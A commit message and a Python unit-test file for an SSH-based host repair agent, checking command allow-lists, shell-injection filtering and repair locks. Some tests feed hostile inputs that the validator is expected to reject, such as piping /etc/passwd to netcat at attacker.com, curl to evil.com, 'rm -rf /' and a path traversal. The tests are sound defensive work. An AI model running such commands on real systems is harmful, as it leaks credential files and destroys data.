P0-1: Complete shell metacharacter regex detection
- Enhanced _SHELL_METACHAR_RE to detect: >, <, \n, ${}, $()
- Blocks additional shell injection vectors (redirects, variable expansion, newlines)
- Added 5 new validation tests
P0-2: Add shlex.quote() protection for ansible playbook path
- Wraps playbook_path in shlex.quote() before SSH command construction
- Prevents shell injection if path contains special characters
- Applied in _execute_ansible() method
P0-3: Add SSH target host whitelist validation
- Introduces validate_ssh_target_host() function
- Only allows SSH to: 192.168.0.110, 192.168.0.188
- Prevents unauthorized SSH target exploitation
- Added 5 new whitelist validation tests
P0-4: Convert HostRepairAgent to singleton pattern
- Implements __new__() singleton with shared _in_process_locks dict
- Ensures in-process locks persist across multiple auto_repair_service calls
- Previously a new instance was created per call, which made the locks ineffective
- Added singleton persistence test
Test Results: 45/45 passing (34 existing + 11 new P0 tests)
All new security validations are covered by unit tests.
Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>
440 lines
19 KiB
Python
440 lines
19 KiB
Python
"""
|
||
tests/test_host_repair_agent.py
|
||
Host Repair Agent 單元測試
|
||
不需要實際 SSH 連線 — 測試路由邏輯和命令組裝
|
||
2026-04-06 Claude Code: Sprint 3 T1 — URI 解析與安全防護測試
|
||
"""
|
||
import asyncio
|
||
import pytest
|
||
from unittest.mock import AsyncMock, patch
|
||
|
||
|
||
# =============================================================================
|
||
# 測試 HostRepairConfig 路由
|
||
# =============================================================================
|
||
|
||
class TestHostRepairConfig:
    """Routing of each repair layer to its SSH target via get_ssh_config_for_layer()."""

    def test_layer_docker_110_routes_to_110(self):
        """The docker-110 layer resolves to user ``wooo`` on 192.168.0.110."""
        from src.services.host_repair_agent import get_ssh_config_for_layer

        ssh_target = get_ssh_config_for_layer("docker-110")
        assert ssh_target["user"] == "wooo"
        assert ssh_target["host"] == "192.168.0.110"

    def test_layer_docker_188_routes_to_188(self):
        """The docker-188 layer resolves to user ``ollama`` on 192.168.0.188."""
        from src.services.host_repair_agent import get_ssh_config_for_layer

        ssh_target = get_ssh_config_for_layer("docker-188")
        assert ssh_target["user"] == "ollama"
        assert ssh_target["host"] == "192.168.0.188"

    def test_layer_systemd_188_routes_to_188(self):
        """The systemd-188 layer also resolves to user ``ollama`` on 192.168.0.188."""
        from src.services.host_repair_agent import get_ssh_config_for_layer

        ssh_target = get_ssh_config_for_layer("systemd-188")
        assert ssh_target["user"] == "ollama"
        assert ssh_target["host"] == "192.168.0.188"

    def test_unknown_layer_raises(self):
        """An unrecognised layer name is rejected with an "Unknown layer" ValueError."""
        from src.services.host_repair_agent import get_ssh_config_for_layer

        bogus_layer = "unknown-layer"
        with pytest.raises(ValueError, match="Unknown layer"):
            get_ssh_config_for_layer(bogus_layer)

    def test_k8s_layer_raises(self):
        """The k8s layer is not reached over SSH, so the lookup must raise.

        The error message is expected to point at ``kubectl`` instead.
        """
        from src.services.host_repair_agent import get_ssh_config_for_layer

        with pytest.raises(ValueError, match="kubectl"):
            get_ssh_config_for_layer("k8s")
|
||
|
||
|
||
# =============================================================================
|
||
# 測試 SSH 命令組裝
|
||
# =============================================================================
|
||
|
||
class TestSSHCommandBuilding:
    """build_repair_command(): output format and component-name sanitisation."""

    def test_repair_command_format(self):
        """A valid component is rendered as ``repair:<component>``."""
        from src.services.host_repair_agent import build_repair_command

        assert build_repair_command("sentry") == "repair:sentry"

    def test_repair_command_component_sanitized(self):
        """A component carrying a shell payload is rejected (command-injection guard)."""
        from src.services.host_repair_agent import build_repair_command

        malicious = "sentry; rm -rf /"
        with pytest.raises(ValueError, match="Invalid component"):
            build_repair_command(malicious)

    def test_repair_command_valid_components(self):
        """Every known component name is accepted and embedded verbatim."""
        from src.services.host_repair_agent import build_repair_command

        known_components = (
            "sentry",
            "harbor",
            "gitea",
            "openclaw",
            "gitea-runner",
            "alertmanager",
            "redis",
            "nginx",
        )
        for name in known_components:
            expected = f"repair:{name}"
            assert build_repair_command(name) == expected
|
||
|
||
|
||
# =============================================================================
|
||
# 測試 HostRepairAgent.repair() 路由
|
||
# =============================================================================
|
||
|
||
class TestHostRepairAgent:
    """HostRepairAgent.repair(): SSH routing and handling of the remote reply.

    Every test patches ``_ssh_execute`` with an AsyncMock, so no real SSH
    connection is opened.
    """

    @pytest.mark.asyncio
    async def test_repair_success_returns_ok(self):
        """A ``REPAIR_OK`` reply maps to success, and SSH targets the docker-110 host."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as ssh_stub:
            ssh_stub.return_value = "REPAIR_OK:sentry"
            outcome = await agent.repair(layer="docker-110", component="sentry")

        assert outcome.success is True
        assert outcome.component == "sentry"
        assert outcome.layer == "docker-110"
        # Exactly one SSH call, carrying the docker-110 credentials and the repair token.
        ssh_stub.assert_called_once_with(
            host="192.168.0.110",
            user="wooo",
            key_path="/etc/repair-ssh/id_ed25519",
            command="repair:sentry",
        )

    @pytest.mark.asyncio
    async def test_repair_fail_returns_failure(self):
        """A ``REPAIR_FAIL`` reply yields a failed result whose error echoes the marker."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as ssh_stub:
            ssh_stub.return_value = "REPAIR_FAIL:harbor:exit_1"
            outcome = await agent.repair(layer="docker-110", component="harbor")

        assert outcome.success is False
        assert "REPAIR_FAIL" in outcome.error

    @pytest.mark.asyncio
    async def test_repair_ssh_timeout_returns_failure(self):
        """An SSH timeout comes back as a failed result mentioning "timeout", not as an exception."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as ssh_stub:
            ssh_stub.side_effect = asyncio.TimeoutError()
            outcome = await agent.repair(layer="docker-110", component="sentry")

        assert outcome.success is False
        assert "timeout" in outcome.error.lower()

    @pytest.mark.asyncio
    async def test_repair_denied_returns_failure(self):
        """A ``REPAIR_DENIED`` reply from the remote host is treated as a failure."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as ssh_stub:
            ssh_stub.return_value = "REPAIR_DENIED:unknown_component:badcomponent"
            outcome = await agent.repair(layer="docker-110", component="badcomponent")

        assert outcome.success is False
|
||
|
||
|
||
# =============================================================================
|
||
# 測試 URI Scheme 解析
|
||
# 2026-04-06 Claude Code: Sprint 3 T1
|
||
# =============================================================================
|
||
|
||
class TestParseUriCommand:
    """parse_uri_command(): splitting ``scheme://host_or_layer/payload`` URIs (Sprint 3 T1)."""

    def test_openclaw_scheme(self):
        """``openclaw://layer/component`` splits into scheme, layer and component."""
        from src.services.host_repair_agent import parse_uri_command

        parsed = parse_uri_command("openclaw://docker-110/sentry")
        assert (parsed.scheme, parsed.host_or_layer, parsed.payload) == (
            "openclaw",
            "docker-110",
            "sentry",
        )

    def test_ansible_scheme(self):
        """``ansible://host/playbook`` splits into scheme, host IP and playbook file."""
        from src.services.host_repair_agent import parse_uri_command

        parsed = parse_uri_command("ansible://192.168.0.188/vacuum_postgres.yml")
        assert (parsed.scheme, parsed.host_or_layer, parsed.payload) == (
            "ansible",
            "192.168.0.188",
            "vacuum_postgres.yml",
        )

    def test_ssh_scheme(self):
        """``ssh://user@host/cmd`` keeps ``user@host`` intact and allows spaces in the payload."""
        from src.services.host_repair_agent import parse_uri_command

        parsed = parse_uri_command("ssh://wooo@192.168.0.110/docker ps")
        assert (parsed.scheme, parsed.host_or_layer, parsed.payload) == (
            "ssh",
            "wooo@192.168.0.110",
            "docker ps",
        )

    def test_invalid_scheme_raises(self):
        """An ``http://`` URI is rejected as an unsupported scheme."""
        from src.services.host_repair_agent import parse_uri_command

        with pytest.raises(ValueError, match="Unsupported scheme"):
            parse_uri_command("http://example.com/cmd")

    def test_missing_payload_raises(self):
        """A URI with nothing after the host segment is rejected for lacking a payload."""
        from src.services.host_repair_agent import parse_uri_command

        with pytest.raises(ValueError, match="payload"):
            parse_uri_command("ansible://192.168.0.188/")

    def test_legacy_format_raises(self):
        """The legacy scheme-less ``layer/component`` form is rejected."""
        from src.services.host_repair_agent import parse_uri_command

        with pytest.raises(ValueError, match="Unsupported scheme"):
            parse_uri_command("docker-110/sentry")
|
||
|
||
|
||
class TestValidateShellSafety:
    """validate_shell_safety(): rejection of shell metacharacters and oversized input."""

    @staticmethod
    def _assert_rejected(command):
        """Assert that *command* is refused as containing a shell metacharacter."""
        from src.services.host_repair_agent import validate_shell_safety

        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(command)

    def test_safe_command_passes(self):
        """A plain command with no metacharacters is accepted."""
        from src.services.host_repair_agent import validate_shell_safety

        validate_shell_safety("docker ps")  # must not raise

    def test_semicolon_blocked(self):
        """``;`` would chain a second command."""
        self._assert_rejected("docker ps; rm -rf /")

    def test_pipe_blocked(self):
        """``|`` would pipe output into another program."""
        self._assert_rejected("cat /etc/passwd | nc attacker.com 9999")

    def test_double_ampersand_blocked(self):
        """``&&`` would run a follow-up command."""
        self._assert_rejected("ls && curl http://evil.com")

    def test_command_substitution_blocked(self):
        """``$(...)`` command substitution is refused."""
        self._assert_rejected("echo $(id)")

    def test_backtick_blocked(self):
        """Backtick command substitution is refused."""
        self._assert_rejected("echo `id`")

    def test_too_long_blocked(self):
        """A 513-character command is rejected as too long."""
        from src.services.host_repair_agent import validate_shell_safety

        oversized = "a" * 513
        with pytest.raises(ValueError, match="too long"):
            validate_shell_safety(oversized)
|
||
|
||
|
||
import os
|
||
from unittest.mock import patch, AsyncMock
|
||
|
||
|
||
class TestAnsibleWhitelist:
    """validate_ansible_playbook(): playbook names are checked against the
    ANSIBLE_PLAYBOOK_WHITELIST environment variable (comma-separated in these tests)."""

    def test_allowed_playbook_passes(self):
        """A playbook named in the whitelist is accepted."""
        from src.services.host_repair_agent import validate_ansible_playbook

        allowed = {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml,clear_redis_cache.yml"}
        with patch.dict(os.environ, allowed):
            validate_ansible_playbook("vacuum_postgres.yml")  # must not raise

    def test_disallowed_playbook_raises(self):
        """A file that is not in the whitelist is refused."""
        from src.services.host_repair_agent import validate_ansible_playbook

        allowed = {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}
        with patch.dict(os.environ, allowed):
            with pytest.raises(ValueError, match="not in allowed whitelist"):
                validate_ansible_playbook("evil_script.sh")

    def test_path_traversal_blocked(self):
        """A ``../``-style path outside the whitelist is refused.

        NOTE(review): any exact-match whitelist rejects this path, so it does not
        exercise traversal handling directly. A traversal that ends in a
        whitelisted name (e.g. ``../vacuum_postgres.yml``) would.
        """
        from src.services.host_repair_agent import validate_ansible_playbook

        allowed = {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}
        with patch.dict(os.environ, allowed):
            with pytest.raises(ValueError, match="not in allowed whitelist"):
                validate_ansible_playbook("../../../etc/passwd")
|
||
|
||
|
||
class TestRepairByUri:
    """HostRepairAgent.repair_by_uri(): dispatch of each URI scheme to its executor."""

    @pytest.mark.asyncio
    async def test_openclaw_scheme_calls_repair(self):
        """``openclaw://layer/component`` is dispatched to ``_execute_openclaw(layer, component)``."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        agent = HostRepairAgent()
        with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as openclaw_stub:
            openclaw_stub.return_value = HostRepairResult(
                success=True,
                layer="docker-110",
                component="sentry",
                output="REPAIR_OK:sentry",
            )
            outcome = await agent.repair_by_uri("openclaw://docker-110/sentry")

        assert outcome.success is True
        openclaw_stub.assert_awaited_once_with("docker-110", "sentry")

    @pytest.mark.asyncio
    async def test_ansible_scheme_calls_ansible(self):
        """``ansible://host/playbook`` is dispatched to ``_execute_ansible(host, playbook)``."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        agent = HostRepairAgent()
        with patch.object(agent, "_execute_ansible", new_callable=AsyncMock) as ansible_stub:
            with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
                ansible_stub.return_value = HostRepairResult(
                    success=True,
                    layer="ansible",
                    component="vacuum_postgres.yml",
                    output="REPAIR_OK:ansible",
                )
                outcome = await agent.repair_by_uri("ansible://192.168.0.188/vacuum_postgres.yml")

        assert outcome.success is True
        ansible_stub.assert_awaited_once_with("192.168.0.188", "vacuum_postgres.yml")

    @pytest.mark.asyncio
    async def test_ssh_scheme_blocked_without_approval_flag(self):
        """Without ``approved=True``, an ``ssh://`` URI fails with a ``requires_approval`` error."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        outcome = await agent.repair_by_uri("ssh://wooo@192.168.0.110/docker ps")

        assert outcome.success is False
        assert "requires_approval" in outcome.error

    @pytest.mark.asyncio
    async def test_invalid_uri_returns_failure(self):
        """A scheme-less string yields a failed result (not an exception) naming the bad scheme."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        outcome = await agent.repair_by_uri("bad-format")

        assert outcome.success is False
        assert "Unsupported scheme" in outcome.error
|
||
|
||
|
||
class TestAuditLog:
    """Audit logging performed by HostRepairAgent.repair_by_uri()."""

    @pytest.mark.asyncio
    async def test_successful_repair_writes_audit_log(self):
        """A successful repair must write an AuditLog entry to the DB.

        Both the executor and ``_write_audit_log`` are mocked, so nothing is
        persisted; the test only checks that the audit hook is invoked.
        """
        # patch / AsyncMock come from the module-level import; the former
        # in-method re-import was redundant.
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        agent = HostRepairAgent()

        with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc, \
                patch.object(agent, "_write_audit_log", new_callable=AsyncMock) as mock_audit:
            mock_oc.return_value = HostRepairResult(
                success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry"
            )

            result = await agent.repair_by_uri("openclaw://docker-110/sentry")

        assert result.success is True
        # `.called` already implies `call_args is not None`, so no second check is needed.
        # NOTE(review): `.called` is True even if the coroutine returned by the
        # AsyncMock is never awaited. If _write_audit_log is always awaited inline
        # (not scheduled fire-and-forget), mock_audit.assert_awaited() is stricter.
        assert mock_audit.called, "AuditLog should be called"
|
||
|
||
|
||
class TestRepairLock:
    """Per-component repair lock enforced by HostRepairAgent.repair_by_uri().

    asyncio, patch and HostRepairResult construction rely on the module-level
    imports; the former in-method re-imports (including an unused AsyncMock)
    were redundant.
    """

    @pytest.mark.asyncio
    async def test_duplicate_repair_is_blocked(self):
        """A second concurrent repair of the same component is rejected by the lock.

        The rejected call must never reach the executor, so the executor runs
        exactly once.
        """
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        agent = HostRepairAgent()

        call_count = 0

        async def fake_execute_openclaw(layer, component):
            nonlocal call_count
            call_count += 1
            await asyncio.sleep(0.1)  # simulate work so the two calls overlap
            return HostRepairResult(success=True, layer=layer, component=component, output="REPAIR_OK:test")

        with patch.object(agent, "_execute_openclaw", side_effect=fake_execute_openclaw):
            results = await asyncio.gather(
                agent.repair_by_uri("openclaw://docker-110/sentry"),
                agent.repair_by_uri("openclaw://docker-110/sentry"),
                return_exceptions=True,
            )

        successes = [r for r in results if isinstance(r, HostRepairResult) and r.success]
        blocked = [
            r for r in results
            if isinstance(r, HostRepairResult) and not r.success and "already running" in r.error
        ]
        assert len(successes) == 1
        assert len(blocked) == 1
        # The blocked call must be turned away before the executor runs.
        assert call_count == 1, "Blocked call must not reach the executor"

    @pytest.mark.asyncio
    async def test_singleton_lock_persistence(self):
        """P0-4: the singleton pattern makes the in-process lock shared across instances."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        # Two constructions must yield the very same object (singleton).
        agent1 = HostRepairAgent()
        agent2 = HostRepairAgent()

        assert agent1 is agent2, "HostRepairAgent should be singleton"
        assert agent1._in_process_locks is agent2._in_process_locks, "Locks dict should be shared"

        call_count = 0

        async def fake_execute(layer, component):
            nonlocal call_count
            call_count += 1
            await asyncio.sleep(0.05)
            return HostRepairResult(success=True, layer=layer, component=component, output="OK")

        # Issue the concurrent calls through *different* handles so the shared lock is exercised.
        with patch.object(agent1, "_execute_openclaw", side_effect=fake_execute):
            results = await asyncio.gather(
                agent1.repair_by_uri("openclaw://docker-110/test"),
                agent2.repair_by_uri("openclaw://docker-110/test"),
                return_exceptions=True,
            )

        successes = [r for r in results if isinstance(r, HostRepairResult) and r.success]
        blocked = [
            r for r in results
            if isinstance(r, HostRepairResult) and not r.success and "already running" in r.error
        ]

        assert len(successes) == 1, "First call should succeed"
        assert len(blocked) == 1, "Second call should be blocked by shared lock"
        assert call_count == 1, "Blocked call must not reach the executor"
|
||
|
||
|
||
# =============================================================================
|
||
# P0-1 Tests: Enhanced shell metacharacter detection
|
||
# =============================================================================
|
||
|
||
class TestEnhancedShellMetacharDetection:
    """2026-04-06 Claude Code: Sprint 3 P0-1 tests (redirects, newlines, ``${}`` expansion)."""

    def test_redirect_out_blocked(self):
        """P0-1: ``>`` output redirection must be blocked."""
        from src.services.host_repair_agent import validate_shell_safety

        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety("ls > /tmp/out")

    def test_append_redirect_blocked(self):
        """P0-1: ``>>`` append redirection must be blocked as well."""
        from src.services.host_repair_agent import validate_shell_safety

        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety("ls >> /tmp/out")

    def test_redirect_in_blocked(self):
        """P0-1: ``<`` input redirection must be blocked."""
        from src.services.host_repair_agent import validate_shell_safety

        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety("cat < /etc/passwd")

    def test_newline_blocked(self):
        """P0-1: a newline must be blocked.

        Otherwise it would let a second command run after the first
        (multi-line command injection).
        """
        from src.services.host_repair_agent import validate_shell_safety

        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety("ls\nrm -rf /")

    def test_dollar_brace_substitution_blocked(self):
        """P0-1: ``${...}`` variable expansion must be blocked."""
        from src.services.host_repair_agent import validate_shell_safety

        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety("echo ${PATH}")

    def test_safe_simple_command_passes(self):
        """P0-1: a simple command without metacharacters must still pass."""
        from src.services.host_repair_agent import validate_shell_safety

        validate_shell_safety("docker ps")  # must not raise
|
||
|
||
|
||
# =============================================================================
|
||
# P0-3 Tests: SSH target host whitelist
|
||
# =============================================================================
|
||
|
||
class TestSSHTargetWhitelist:
    """2026-04-06 Claude Code: Sprint 3 P0-3 tests (SSH target host whitelist)."""

    def test_allowed_host_110_passes(self):
        """P0-3: 192.168.0.110 is whitelisted and must pass."""
        from src.services.host_repair_agent import validate_ssh_target_host

        validate_ssh_target_host("192.168.0.110")  # must not raise

    def test_allowed_host_188_passes(self):
        """P0-3: 192.168.0.188 is whitelisted and must pass."""
        from src.services.host_repair_agent import validate_ssh_target_host

        validate_ssh_target_host("192.168.0.188")  # must not raise

    def test_unauthorized_host_blocked(self):
        """P0-3: a host outside the whitelist must be blocked."""
        from src.services.host_repair_agent import validate_ssh_target_host

        with pytest.raises(ValueError, match="not in allowed whitelist"):
            validate_ssh_target_host("192.168.0.999")

    def test_lookalike_hosts_blocked(self):
        """P0-3: hosts that merely resemble a whitelisted IP must be blocked.

        192.168.0.999 is not a valid IPv4 address. Testing it alone therefore
        does not show that a real-but-unlisted address is refused. It also does
        not show that the check is an exact match rather than a prefix or
        substring match.
        """
        from src.services.host_repair_agent import validate_ssh_target_host

        lookalikes = (
            "192.168.0.1",                     # valid address, not whitelisted
            "192.168.0.11",                    # prefix of 192.168.0.110
            "192.168.0.1100",                  # whitelisted IP with an extra digit
            "192.168.0.110.attacker.example",  # whitelisted IP as a hostname prefix
        )
        for host in lookalikes:
            with pytest.raises(ValueError, match="not in allowed whitelist"):
                validate_ssh_target_host(host)

    def test_localhost_blocked(self):
        """P0-3: localhost must be blocked."""
        from src.services.host_repair_agent import validate_ssh_target_host

        with pytest.raises(ValueError, match="not in allowed whitelist"):
            validate_ssh_target_host("127.0.0.1")

    @pytest.mark.asyncio
    async def test_ssh_scheme_with_unauthorized_host_fails(self):
        """P0-3: an ``ssh://`` URI targeting an unauthorised host fails even when approved."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        result = await agent.repair_by_uri("ssh://wooo@192.168.0.999/ls", approved=True)

        assert result.success is False
        assert "not in allowed whitelist" in result.error
|